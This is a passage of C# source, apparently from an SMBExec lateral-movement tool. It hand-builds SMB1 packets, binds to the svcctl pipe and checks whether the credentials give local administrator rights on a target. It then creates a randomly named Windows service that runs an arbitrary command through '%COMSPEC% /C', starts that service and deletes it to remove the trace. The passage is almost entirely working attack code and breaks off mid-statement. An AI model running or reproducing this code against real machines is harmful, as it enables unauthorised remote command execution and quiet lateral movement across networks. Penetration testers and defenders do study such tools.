if (ForceSMB1)
{
SMB_Path_Bytes = Encoding.UTF8.GetBytes(SMB_Path).Concat(new byte[] { 0x00 }).ToArray();
}
else
{
SMB_Path_Bytes = Encoding.Unicode.GetBytes(SMB_Path);
}
byte[] SMB_named_pipe_UUID = { 0x81, 0xbb, 0x7a, 0x36, 0x44, 0x98, 0xf1, 0x35, 0xad, 0x32, 0x98, 0xf0, 0x38, 0x00, 0x10, 0x03 };
byte[] SMB_Service_Bytes;
string SMB_Service = null;
if (string.IsNullOrEmpty(ServiceName))
{
const string chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZ";
var rand = new Random();
SMB_Service = new string(Enumerable.Repeat(chars, 20).Select(s => s[rand.Next(s.Length)]).ToArray());
SMB_Service_Bytes = Encoding.Unicode.GetBytes(SMB_Service).Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }).ToArray();
}
else
{
SMB_Service = ServiceName;
SMB_Service_Bytes = Encoding.Unicode.GetBytes(SMB_Service);
if (Convert.ToBoolean(SMB_Service.Length % 2))
{
SMB_Service_Bytes = SMB_Service_Bytes.Concat(new byte[] { 0x00, 0x00 }).ToArray();
}
else
{
SMB_Service_Bytes = SMB_Service_Bytes.Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }).ToArray();
}
}
if (debug) { output.AppendLine(String.Format("Service Name is {0}", SMB_Service)); }
byte[] SMB_Service_Length = BitConverter.GetBytes(SMB_Service.Length + 1);
if (ComSpec)
{
if (debug) { output.AppendLine("Appending %COMSPEC% /C"); }
command = "%COMSPEC% /C \"" + command + "\"";
}
byte[] commandBytes = Encoding.UTF8.GetBytes(command);
List SMBExec_Command_List = new List();
foreach (byte commandByte in commandBytes)
{
SMBExec_Command_List.Add(commandByte);
SMBExec_Command_List.Add(0x00);
}
byte[] SMBExec_Command_Init = SMBExec_Command_List.ToArray();
if (Convert.ToBoolean(command.Length % 2))
{
SMBExec_Command = SMBExec_Command_Init.Concat(new byte[] { 0x00, 0x00 }).ToArray();
}
else
{
SMBExec_Command = SMBExec_Command_Init.Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }).ToArray();
}
byte[] SMBExec_Command_Length_bytes = BitConverter.GetBytes(SMBExec_Command.Length / 2);
int SMB_Split_Index = 4256;
int SMB_Signing_Counter = 0;
byte[] SMB_Tree_ID = new byte[2];
string SMB_Client_Stage_Next = "";
if (ForceSMB1)
{
SMBClientStage = "TreeConnectAndXRequest";
while (SMBClientStage != "exit" && SMBExec_Failed == false)
{
if (debug) { output.AppendLine(String.Format("Current Stage {0}", SMBClientStage)); }
switch (SMBClientStage)
{
case "TreeConnectAndXRequest":
{
Packet_SMB_Header = new OrderedDictionary();
Packet_SMB_Header = SMBExec.SMBHeader(new byte[] { 0x75 }, new byte[] { 0x18 }, new byte[] { 0x01, 0x48 }, new byte[] { 0xff, 0xff }, Process_ID_Bytes, SMB_User_ID);
if (SMB_Signing)
{
Packet_SMB_Header["SMBHeader_Flags2"] = new byte[] { 0x05, 0x48 };
SMB_Signing_Counter = 2;
SMB_Signing_Sequence = BitConverter.GetBytes(SMB_Signing_Counter).Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }).ToArray();
Packet_SMB_Header["SMBHeader_Signature"] = SMB_Signing_Sequence;
}
SMB_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Header);
Packet_SMB_Data = SMBExec.SMBTreeConnectAndXRequest(SMB_Path_Bytes);
SMB_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Data);
NetBIOS_Session_Service = GetNetBIOSSessionService(SMB_Header.Length, SMB_Data.Length);
if (SMB_Signing)
{
SMB_Sign = Session_Key.Concat(SMB_Header).Concat(SMB_Data).ToArray();
SMB_Signature = MD5Crypto.ComputeHash(SMB_Sign);
SMB_Signature2 = Utilities.GetByteRange(SMB_Signature, 0, 7);
Packet_SMB_Header["SMBHeader_Signature"] = SMB_Signature2;
SMB_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Header);
}
SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB_Header).Concat(SMB_Data).ToArray();
SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
SMBClientStage = "CreateAndXRequest";
}
break;
case "CreateAndXRequest":
{
SMB_Named_Pipe_Bytes = new byte[] { 0x5c, 0x73, 0x76, 0x63, 0x63, 0x74, 0x6c, 0x00 }; //svcctl
SMB_Tree_ID = Utilities.GetByteRange(SMBClientReceive, 28, 29);
Packet_SMB_Header = SMBExec.SMBHeader(new byte[] { 0xa2 }, new byte[] { 0x18 }, new byte[] { 0x02, 0x28 }, SMB_Tree_ID, Process_ID_Bytes, SMB_User_ID);
if (SMB_Signing)
{
Packet_SMB_Header["SMBHeader_Flags2"] = new byte[] { 0x05, 0x48 };
SMB_Signing_Counter += 2;
SMB_Signing_Sequence = BitConverter.GetBytes(SMB_Signing_Counter).Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }).ToArray();
Packet_SMB_Header["SMBHeader_Signature"] = SMB_Signing_Sequence;
}
SMB_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Header);
Packet_SMB_Data = SMBExec.SMBNTCreateAndXRequest(SMB_Named_Pipe_Bytes);
SMB_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Data);
NetBIOS_Session_Service = GetNetBIOSSessionService(SMB_Header.Length, SMB_Data.Length);
if (SMB_Signing)
{
SMB_Sign = Session_Key.Concat(SMB_Header).Concat(SMB_Data).ToArray();
SMB_Signature = MD5Crypto.ComputeHash(SMB_Sign);
SMB_Signature2 = Utilities.GetByteRange(SMB_Signature, 0, 7);
Packet_SMB_Header["SMBHeader_Signature"] = SMB_Signature2;
SMB_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Header);
}
SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB_Header).Concat(SMB_Data).ToArray();
SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
SMBClientStage = "RPCBind";
}
break;
case "RPCBind":
{
SMB_FID = Utilities.GetByteRange(SMBClientReceive, 42, 43);
Packet_SMB_Header = SMBExec.SMBHeader(new byte[] { 0x2f }, new byte[] { 0x18 }, new byte[] { 0x05, 0x28 }, SMB_Tree_ID, Process_ID_Bytes, SMB_User_ID);
if (SMB_Signing)
{
Packet_SMB_Header["SMBHeader_Flags2"] = new byte[] { 0x05, 0x48 };
SMB_Signing_Counter += 2;
SMB_Signing_Sequence = BitConverter.GetBytes(SMB_Signing_Counter).Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }).ToArray();
Packet_SMB_Header["SMBHeader_Signature"] = SMB_Signing_Sequence;
}
SMB_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Header);
Packet_RPC_Data = SMBExec.RPCBind(1, new byte[] { 0xb8, 0x10 }, new byte[] { 0x01 }, new byte[] { 0x00, 0x00 }, SMB_named_pipe_UUID, new byte[] { 0x02, 0x00 });
RPC_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_RPC_Data);
Packet_SMB_Data = SMBExec.SMBWriteAndXRequest(SMB_FID, RPC_Data.Length);
SMB_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Data);
int RPC_Data_Length = SMB_Data.Length + RPC_Data.Length;
NetBIOS_Session_Service = GetNetBIOSSessionService(SMB_Header.Length, RPC_Data_Length);
if (SMB_Signing)
{
SMB_Sign = Session_Key.Concat(SMB_Header).Concat(SMB_Data).Concat(RPC_Data).ToArray();
SMB_Signature = MD5Crypto.ComputeHash(SMB_Sign);
SMB_Signature = Utilities.GetByteRange(SMB_Signature, 0, 7);
Packet_SMB_Header["SMBHeader_Signature"] = SMB_Signature;
SMB_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Header);
}
SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB_Header).Concat(SMB_Data).Concat(RPC_Data).ToArray();
SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
SMBClientStage = "ReadAndXRequest";
SMB_Client_Stage_Next = "OpenSCManagerW";
}
break;
case "ReadAndXRequest":
{
Thread.Sleep(sleep * 1000);
Packet_SMB_Header = SMBExec.SMBHeader(new byte[] { 0x2e }, new byte[] { 0x18 }, new byte[] { 0x05, 0x28 }, SMB_Tree_ID, Process_ID_Bytes, SMB_User_ID);
if (SMB_Signing)
{
Packet_SMB_Header["SMBHeader_Flags2"] = new byte[] { 0x05, 0x48 };
SMB_Signing_Counter += 2;
SMB_Signing_Sequence = BitConverter.GetBytes(SMB_Signing_Counter).Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }).ToArray();
Packet_SMB_Header["SMBHeader_Signature"] = SMB_Signing_Sequence;
}
SMB_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Header);
Packet_SMB_Data = SMBExec.SMBReadAndXRequest(SMB_FID);
SMB_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Data);
NetBIOS_Session_Service = GetNetBIOSSessionService(SMB_Header.Length, SMB_Data.Length);
if (SMB_Signing)
{
SMB_Sign = Session_Key.Concat(SMB_Header).Concat(SMB_Data).ToArray();
SMB_Signature = MD5Crypto.ComputeHash(SMB_Sign);
SMB_Signature2 = Utilities.GetByteRange(SMB_Signature, 0, 7);
Packet_SMB_Header["SMBHeader_Signature"] = SMB_Signature2;
SMB_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Header);
}
SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB_Header).Concat(SMB_Data).ToArray();
SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
SMBClientStage = SMB_Client_Stage_Next;
}
break;
case "OpenSCManagerW":
{
Packet_SMB_Header = SMBExec.SMBHeader(new byte[] { 0x2f }, new byte[] { 0x18 }, new byte[] { 0x05, 0x28 }, SMB_Tree_ID, Process_ID_Bytes, SMB_User_ID);
if (SMB_Signing)
{
Packet_SMB_Header["SMBHeader_Flags2"] = new byte[] { 0x05, 0x48 };
SMB_Signing_Counter += 2;
SMB_Signing_Sequence = BitConverter.GetBytes(SMB_Signing_Counter).Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }).ToArray();
Packet_SMB_Header["SMBHeader_Signature"] = SMB_Signing_Sequence;
}
Packet_SCM_Data = SMBExec.SCMOpenSCManagerW(SMB_Service_Bytes, SMB_Service_Length);
SCM_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SCM_Data);
Packet_RPC_Data = SMBExec.RPCRequest(new byte[] { 0x03 }, SCM_Data.Length, 0, 0, new byte[] { 0x01, 0x00, 0x00, 0x00 }, new byte[] { 0x00, 0x00 }, new byte[] { 0x0f, 0x00 }, null);
RPC_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_RPC_Data);
SMB_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Header);
Packet_SMB_Data = SMBExec.SMBWriteAndXRequest(SMB_FID, (RPC_Data.Length + SCM_Data.Length));
SMB_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Data);
int RPC_Data_Length = SMB_Data.Length + SCM_Data.Length + RPC_Data.Length;
NetBIOS_Session_Service = GetNetBIOSSessionService(SMB_Header.Length, RPC_Data_Length);
if (SMB_Signing)
{
SMB_Sign = Session_Key.Concat(SMB_Header).Concat(SMB_Data).Concat(RPC_Data).Concat(SCM_Data).ToArray();
SMB_Signature = MD5Crypto.ComputeHash(SMB_Sign);
SMB_Signature = Utilities.GetByteRange(SMB_Signature, 0, 7);
Packet_SMB_Header["SMBHeader_Signature"] = SMB_Signature;
SMB_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Header);
}
SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB_Header).Concat(SMB_Data).Concat(RPC_Data).Concat(SCM_Data).ToArray();
SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
SMBClientStage = "ReadAndXRequest";
SMB_Client_Stage_Next = "CheckAccess";
}
break;
case "CheckAccess":
{
if (BitConverter.ToString(Utilities.GetByteRange(SMBClientReceive, 108, 111)) == "00-00-00-00" && BitConverter.ToString(Utilities.GetByteRange(SMBClientReceive, 88, 107)) != "00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00")
{
SMB_Service_Manager_Context_Handle = Utilities.GetByteRange(SMBClientReceive, 88, 107);
if (SMB_execute)
{
Packet_SCM_Data = SMBExec.SCMCreateServiceW(SMB_Service_Manager_Context_Handle, SMB_Service_Bytes, SMB_Service_Length, SMBExec_Command, SMBExec_Command_Length_bytes);
SCM_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SCM_Data);
if (SCM_Data.Length < SMB_Split_Index)
{
SMBClientStage = "CreateServiceW";
}
else
{
SMBClientStage = "CreateServiceW_First";
}
}
else
{
output.AppendLine(String.Format("{0} is a local administrator on {1}", Output_Username, Target));
SMB_Close_Service_Handle_Stage = 2;
SMBClientStage = "CloseServiceHandle";
}
}
else if (BitConverter.ToString(Utilities.GetByteRange(SMBClientReceive, 108, 111)) == "05-00-00-00")
{
output.AppendLine(String.Format("{0} is not a local administrator or does not have the required privileges on {1}", Output_Username, Target));
Console.WriteLine(output.ToString());
}
else
{
if (debug)
{
output.AppendLine(BitConverter.ToString(Utilities.GetByteRange(SMBClientReceive, 108, 111)));
output.AppendLine(BitConverter.ToString(Utilities.GetByteRange(SMBClientReceive, 88, 107)));
}
output.AppendLine(String.Format("Something went wrong with {0}", Target));
Console.WriteLine(output.ToString());
}
}
break;
case "CreateServiceW":
{
Packet_SMB_Header = SMBExec.SMBHeader(new byte[] { 0x2f }, new byte[] { 0x18 }, new byte[] { 0x05, 0x28 }, SMB_Tree_ID, Process_ID_Bytes, SMB_User_ID);
if (SMB_Signing)
{
Packet_SMB_Header["SMBHeader_Flags2"] = new byte[] { 0x05, 0x48 };
SMB_Signing_Counter += 2;
SMB_Signing_Sequence = BitConverter.GetBytes(SMB_Signing_Counter).Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }).ToArray();
Packet_SMB_Header["SMBHeader_Signature"] = SMB_Signing_Sequence;
}
Packet_SCM_Data = SMBExec.SCMCreateServiceW(SMB_Service_Manager_Context_Handle, SMB_Service_Bytes, SMB_Service_Length, SMBExec_Command, SMBExec_Command_Length_bytes);
SCM_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SCM_Data);
Packet_RPC_Data = SMBExec.RPCRequest(new byte[] { 0x03 }, SCM_Data.Length, 0, 0, new byte[] { 0x02, 0x00, 0x00, 0x00 }, new byte[] { 0x00, 0x00 }, new byte[] { 0x0c, 0x00 }, null);
RPC_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_RPC_Data);
SMB_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Header);
Packet_SMB_Data = SMBExec.SMBWriteAndXRequest(SMB_FID, RPC_Data.Length + SCM_Data.Length);
SMB_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Data);
int RPC_Data_Length = SMB_Data.Length + SCM_Data.Length + RPC_Data.Length;
NetBIOS_Session_Service = GetNetBIOSSessionService(SMB_Header.Length, RPC_Data_Length);
if (SMB_Signing)
{
SMB_Sign = Session_Key.Concat(SMB_Header).Concat(SMB_Data).Concat(RPC_Data).Concat(SCM_Data).ToArray();
SMB_Signature = MD5Crypto.ComputeHash(SMB_Sign);
SMB_Signature = Utilities.GetByteRange(SMB_Signature, 0, 7);
Packet_SMB_Header["SMBHeader_Signature"] = SMB_Signature;
SMB_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Header);
}
SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB_Header).Concat(SMB_Data).Concat(RPC_Data).Concat(SCM_Data).ToArray();
SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
SMBClientStage = "ReadAndXRequest";
SMB_Client_Stage_Next = "StartServiceW";
}
break;
case "CreateServiceW_First":
{
SMB_Split_Stage_final = Math.Ceiling((double)SCM_Data.Length / SMB_Split_Index);
Packet_SMB_Header = SMBExec.SMBHeader(new byte[] { 0x2f }, new byte[] { 0x18 }, new byte[] { 0x05, 0x28 }, SMB_Tree_ID, Process_ID_Bytes, SMB_User_ID);
if (SMB_Signing)
{
Packet_SMB_Header["SMBHeader_Flags2"] = new byte[] { 0x05, 0x48 };
SMB_Signing_Counter += 2;
SMB_Signing_Sequence = BitConverter.GetBytes(SMB_Signing_Counter).Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }).ToArray();
Packet_SMB_Header["SMBHeader_Signature"] = SMB_Signing_Sequence;
}
byte[] SCM_Data_First = Utilities.GetByteRange(SCM_Data, 0, SMB_Split_Index - 1);
Packet_RPC_Data = SMBExec.RPCRequest(new byte[] { 0x01 }, 0, 0, 0, new byte[] { 0x02, 0x00, 0x00, 0x00 }, new byte[] { 0x00, 0x00 }, new byte[] { 0x0c, 0x00 }, SCM_Data_First);
Packet_RPC_Data["RPCRequest_AllocHint"] = BitConverter.GetBytes(SCM_Data.Length);
SMB_Split_Index_Tracker = SMB_Split_Index;
RPC_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_RPC_Data);
SMB_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Header);
Packet_SMB_Data = SMBExec.SMBWriteAndXRequest(SMB_FID, RPC_Data.Length);
SMB_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Data);
int RPC_Data_Length = SMB_Data.Length + RPC_Data.Length;
NetBIOS_Session_Service = GetNetBIOSSessionService(SMB_Header.Length, RPC_Data_Length);
if (SMB_Signing)
{
SMB_Sign = Session_Key.Concat(SMB_Header).Concat(SMB_Data).Concat(RPC_Data).ToArray();
SMB_Signature = MD5Crypto.ComputeHash(SMB_Sign);
SMB_Signature = Utilities.GetByteRange(SMB_Signature, 0, 7);
Packet_SMB_Header["SMBHeader_Signature"] = SMB_Signature;
SMB_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Header);
}
SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB_Header).Concat(SMB_Data).Concat(RPC_Data).ToArray();
SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
if (SMB_Split_Stage_final <= 2)
{
SMBClientStage = "CreateServiceW_Last";
}
else
{
SMB_Split_Stage = 2;
SMBClientStage = "CreateServiceW_Middle";
}
}
break;
case "CreateServiceW_Middle":
{
SMB_Split_Stage++;
Packet_SMB_Header = SMBExec.SMBHeader(new byte[] { 0x2f }, new byte[] { 0x18 }, new byte[] { 0x05, 0x28 }, SMB_Tree_ID, Process_ID_Bytes, SMB_User_ID);
if (SMB_Signing)
{
Packet_SMB_Header["SMBHeader_Flags2"] = new byte[] { 0x05, 0x48 };
SMB_Signing_Counter += 2;
SMB_Signing_Sequence = BitConverter.GetBytes(SMB_Signing_Counter).Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }).ToArray();
Packet_SMB_Header["SMBHeader_Signature"] = SMB_Signing_Sequence;
}
byte[] SCM_Data_Middle = Utilities.GetByteRange(SCM_Data, SMB_Split_Index_Tracker, SMB_Split_Index_Tracker + SMB_Split_Index - 1);
SMB_Split_Index_Tracker += SMB_Split_Index;
Packet_RPC_Data = SMBExec.RPCRequest(new byte[] { 0x00 }, 0, 0, 0, new byte[] { 0x02, 0x00, 0x00, 0x00 }, new byte[] { 0x00, 0x00 }, new byte[] { 0x0c, 0x00 }, SCM_Data_Middle);
Packet_RPC_Data["RPCRequest_AllocHint"] = BitConverter.GetBytes(SCM_Data.Length - SMB_Split_Index_Tracker + SMB_Split_Index);
RPC_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_RPC_Data);
SMB_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Header);
Packet_SMB_Data = SMBExec.SMBWriteAndXRequest(SMB_FID, RPC_Data.Length);
SMB_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Data);
int RPC_Data_Length = SMB_Data.Length + RPC_Data.Length;
NetBIOS_Session_Service = GetNetBIOSSessionService(SMB_Header.Length, RPC_Data_Length);
if (SMB_Signing)
{
SMB_Sign = Session_Key.Concat(SMB_Header).Concat(SMB_Data).Concat(RPC_Data).ToArray();
SMB_Signature = MD5Crypto.ComputeHash(SMB_Sign);
SMB_Signature = Utilities.GetByteRange(SMB_Signature, 0, 7);
Packet_SMB_Header["SMBHeader_Signature"] = SMB_Signature;
SMB_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Header);
}
SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB_Header).Concat(SMB_Data).Concat(RPC_Data).ToArray();
SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
if (SMB_Split_Stage >= SMB_Split_Stage_final)
{
SMBClientStage = "CreateServiceW_Last";
}
else
{
SMBClientStage = "CreateServiceW_Middle";
}
}
break;
case "CreateServiceW_Last":
{
Packet_SMB_Header = SMBExec.SMBHeader(new byte[] { 0x2f }, new byte[] { 0x18 }, new byte[] { 0x05, 0x48 }, SMB_Tree_ID, Process_ID_Bytes, SMB_User_ID);
if (SMB_Signing)
{
Packet_SMB_Header["SMBHeader_Flags2"] = new byte[] { 0x05, 0x48 };
SMB_Signing_Counter += 2;
SMB_Signing_Sequence = BitConverter.GetBytes(SMB_Signing_Counter).Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }).ToArray();
Packet_SMB_Header["SMBHeader_Signature"] = SMB_Signing_Sequence;
}
byte[] SCM_Data_Last = Utilities.GetByteRange(SCM_Data, SMB_Split_Index_Tracker, SCM_Data.Length);
SMB_Split_Index_Tracker += SMB_Split_Index;
Packet_RPC_Data = SMBExec.RPCRequest(new byte[] { 0x02 }, 0, 0, 0, new byte[] { 0x02, 0x00, 0x00, 0x00 }, new byte[] { 0x00, 0x00 }, new byte[] { 0x0c, 0x00 }, SCM_Data_Last);
RPC_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_RPC_Data);
SMB_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Header);
Packet_SMB_Data = SMBExec.SMBWriteAndXRequest(SMB_FID, RPC_Data.Length);
SMB_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Data);
int RPC_Data_Length = SMB_Data.Length + RPC_Data.Length;
NetBIOS_Session_Service = GetNetBIOSSessionService(SMB_Header.Length, RPC_Data_Length);
if (SMB_Signing)
{
SMB_Sign = Session_Key.Concat(SMB_Header).Concat(SMB_Data).Concat(RPC_Data).ToArray();
SMB_Signature = MD5Crypto.ComputeHash(SMB_Sign);
SMB_Signature = Utilities.GetByteRange(SMB_Signature, 0, 7);
Packet_SMB_Header["SMBHeader_Signature"] = SMB_Signature;
SMB_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Header);
}
SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB_Header).Concat(SMB_Data).Concat(RPC_Data).ToArray();
SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
SMBClientStage = "ReadAndXRequest";
SMB_Client_Stage_Next = "StartServiceW";
}
break;
case "StartServiceW":
{
if (BitConverter.ToString(Utilities.GetByteRange(SMBClientReceive, 112, 115)) == "00-00-00-00")
{
SMB_Service_Context_Handle = Utilities.GetByteRange(SMBClientReceive, 92, 111);
Packet_SMB_Header = SMBExec.SMBHeader(new byte[] { 0x2f }, new byte[] { 0x18 }, new byte[] { 0x05, 0x28 }, SMB_Tree_ID, Process_ID_Bytes, SMB_User_ID);
if (SMB_Signing)
{
Packet_SMB_Header["SMBHeader_Flags2"] = new byte[] { 0x05, 0x48 };
SMB_Signing_Counter += 2;
SMB_Signing_Sequence = BitConverter.GetBytes(SMB_Signing_Counter).Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }).ToArray();
Packet_SMB_Header["SMBHeader_Signature"] = SMB_Signing_Sequence;
}
Packet_SCM_Data = SMBExec.SCMStartServiceW(SMB_Service_Context_Handle);
SCM_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SCM_Data);
Packet_RPC_Data = SMBExec.RPCRequest(new byte[] { 0x03 }, SCM_Data.Length, 0, 0, new byte[] { 0x03, 0x00, 0x00, 0x00 }, new byte[] { 0x00, 0x00 }, new byte[] { 0x13, 0x00 }, null);
RPC_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_RPC_Data);
SMB_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Header);
Packet_SMB_Data = SMBExec.SMBWriteAndXRequest(SMB_FID, RPC_Data.Length + SCM_Data.Length);
SMB_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Data);
int RPC_Data_Length = SMB_Data.Length + SCM_Data.Length + RPC_Data.Length;
NetBIOS_Session_Service = GetNetBIOSSessionService(SMB_Header.Length, RPC_Data_Length);
if (SMB_Signing)
{
SMB_Sign = Session_Key.Concat(SMB_Header).Concat(SMB_Data).Concat(RPC_Data).Concat(SCM_Data).ToArray();
SMB_Signature = MD5Crypto.ComputeHash(SMB_Sign);
SMB_Signature = Utilities.GetByteRange(SMB_Signature, 0, 7);
Packet_SMB_Header["SMBHeader_Signature"] = SMB_Signature;
SMB_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Header);
}
SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB_Header).Concat(SMB_Data).Concat(RPC_Data).Concat(SCM_Data).ToArray();
SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
SMBClientStage = "ReadAndXRequest";
SMB_Client_Stage_Next = "DeleteServiceW";
}
else if (BitConverter.ToString(Utilities.GetByteRange(SMBClientReceive, 112, 115)) == "31-04-00-00")
{
output.AppendLine(String.Format("Service {0} creation failed on {1}", SMB_Service, Target));
Console.WriteLine(output.ToString());
}
else
{
output.AppendLine("Service Creation Fault Context Mismatch");
Console.WriteLine(output.ToString());
}
}
break;
case "DeleteServiceW":
{
if (BitConverter.ToString(Utilities.GetByteRange(SMBClientReceive, 88, 91)) == "1D-04-00-00")
{
if (debug) { output.AppendLine(String.Format("Command Executed with ServiceName: {0} on {1}", SMB_Service, Target)); }
}
else if (BitConverter.ToString(Utilities.GetByteRange(SMBClientReceive, 88, 91)) == "02-00-00-00")
{
SMBExec_Failed = true;
if (debug) { output.AppendLine(String.Format("Service {0} failed to start on {1}", SMB_Service, Target)); }
}
Packet_SMB_Header = SMBExec.SMBHeader(new byte[] { 0x2f }, new byte[] { 0x18 }, new byte[] { 0x05, 0x28 }, SMB_Tree_ID, Process_ID_Bytes, SMB_User_ID);
if (SMB_Signing)
{
Packet_SMB_Header["SMBHeader_Flags2"] = new byte[] { 0x05, 0x48 };
SMB_Signing_Counter += 2;
SMB_Signing_Sequence = BitConverter.GetBytes(SMB_Signing_Counter).Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }).ToArray();
Packet_SMB_Header["SMBHeader_Signature"] = SMB_Signing_Sequence;
}
Packet_SCM_Data = SMBExec.SCMDeleteServiceW(SMB_Service_Context_Handle);
SCM_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SCM_Data);
Packet_RPC_Data = SMBExec.RPCRequest(new byte[] { 0x03 }, SCM_Data.Length, 0, 0, new byte[] { 0x04, 0x00, 0x00, 0x00 }, new byte[] { 0x00, 0x00 }, new byte[] { 0x02, 0x00 }, null);
RPC_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_RPC_Data);
SMB_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Header);
Packet_SMB_Data = SMBExec.SMBWriteAndXRequest(SMB_FID, RPC_Data.Length + SCM_Data.Length);
SMB_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Data);
int RPC_Data_Length = SMB_Data.Length + SCM_Data.Length + RPC_Data.Length;
NetBIOS_Session_Service = GetNetBIOSSessionService(SMB_Header.Length, RPC_Data_Length);
if (SMB_Signing)
{
SMB_Sign = Session_Key.Concat(SMB_Header).Concat(SMB_Data).Concat(RPC_Data).Concat(SCM_Data).ToArray();
SMB_Signature = MD5Crypto.ComputeHash(SMB_Sign);
SMB_Signature = Utilities.GetByteRange(SMB_Signature, 0, 7);
Packet_SMB_Header["SMBHeader_Signature"] = SMB_Signature;
SMB_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Header);
}
SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB_Header).Concat(SMB_Data).Concat(RPC_Data).Concat(SCM_Data).ToArray();
SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
SMBClientStage = "ReadAndXRequest";
SMB_Client_Stage_Next = "CloseServiceHandle";
SMB_Close_Service_Handle_Stage = 1;
}
break;
case "CloseServiceHandle":
{
Packet_SCM_Data = new OrderedDictionary();
if (SMB_Close_Service_Handle_Stage == 1)
{
if (debug) { output.AppendLine(String.Format("Service {0} deleted on {1}", SMB_Service, Target)); }
Service_Deleted = true;
SMB_Close_Service_Handle_Stage++;
Packet_SCM_Data = SMBExec.SCMCloseServiceHandle(SMB_Service_Context_Handle);
}
else
{
SMBClientStage = "CloseRequest";
Packet_SCM_Data = SMBExec.SCMCloseServiceHandle(SMB_Service_Manager_Context_Handle);
}
Packet_SMB_Header = SMBExec.SMBHeader(new byte[] { 0x2f }, new byte[] { 0x18 }, new byte[] { 0x05, 0x28 }, SMB_Tree_ID, Process_ID_Bytes, SMB_User_ID);
if (SMB_Signing)
{
Packet_SMB_Header["SMBHeader_Flags2"] = new byte[] { 0x05, 0x48 };
SMB_Signing_Counter += 2;
SMB_Signing_Sequence = BitConverter.GetBytes(SMB_Signing_Counter).Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }).ToArray();
